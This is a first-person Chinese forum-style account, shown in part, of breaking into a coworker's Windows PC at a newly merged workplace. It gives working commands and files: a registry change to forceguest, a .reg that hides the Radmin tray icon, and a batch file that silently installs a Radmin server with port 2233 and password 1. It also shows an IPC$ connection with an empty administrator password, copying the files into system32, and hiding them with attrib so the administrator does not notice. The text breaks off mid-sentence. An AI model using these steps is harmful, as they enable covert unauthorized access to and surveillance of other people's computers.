内容提要:这是一次真实的入侵实例 事情发生在2005年的九月的一天,我们单位被集团公司的另一个大单位兼并。被兼并的第二天,大单位的财务人员到了我们厂,对我们厂进行了全面的财务审查。虽然没查出什么问题,显然这帮人是对我 …… |
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"forceguest"=dword:00000000
第五条命令是将这个REG文件导入到注册表中。这样执行完这五条命令后,我就可以像操作2000系统一样去用ipc$控制了。下一步,上传控制程序。我选择的是RADMIN2.0的服务程序,有人问这个安装需要到图形界面下,我说不用这么费事,在CMDSHELL下一样可以安装。安装前我们需要先准备一下,首先生成一个REG文件,文件名:aaa.reg 内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00
作用就是使生成的服务端程序能够隐藏通知栏里的图标,我们都知道正常安装RADMIN服务端程序后,在通知栏里是有一个小图标的,我们要入侵人家,当然要把这个小图标去掉,不然是会被发现的。接着生成一个BAT文件,我命名为aaa.bat,内容如下:
r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server
这些命令是安装命令,设置连接端口为:2233 密码是:1 隐藏安装界面的方式安装 然后就是将aaa.reg导入注册表,启动r_server服务。
准备工作作好后,就要上传文件了,一共需上传4个文件,aaa.reg aaa.bat r_server.exe admdll.dll 后两个文件是RADMIN安装目录下的,在安装了RADMIN2.0客户端后,安装目录里就有这两个文件。我先建立ipc$连接 net use [url=file://\\192.168.16.4\ipc$]\\192.168.16.4\ipc$[/url] "" /user:administrator 提示:命令成功完成。接着:
copy r_server [url=file://\\192.168.1.4\admin$\system32]\\192.168.1.4\admin$\system32[/url]
copy aaa.bat [url=file://\\192.168.1.4\admin$\system32]\\192.168.1.4\admin$\system32[/url]
copy aaa.reg [url=file://\\192.168.1.4\admin$\system32]\\192.168.1.4\admin$\system32[/url]
copy admdll.dll [url=file://\\192.168.1.4\admin$\system32]\\192.168.1.4\admin$\system32[/url]
然后再进入溢出得到的CMDSHELL下键入:
attrib +s +h +r c:\windows\system32\r_server.exe
attrib +s +h +r c:\windows\system32\admdll.exe
attrib +s +h +r c:\windows\system32\aaa.bat
attrib +s +h +r c:\windows\system32\aaa.reg
这些命令是将这4个文件设置成系统隐藏只读文件,不容易被对方管理员发现。
下一步就是运行aaa.bat了,就这么简单,运行成功后,我用radmin2.0客户端设置了一下连接参数,端口改成2233,连接成功,密码是1,成功地看到了对方的屏幕。呵呵,成功了,从有入侵的想法到入侵成功进行控制,只用了短短的4天时间。
进入后看到对方电脑上正在玩Q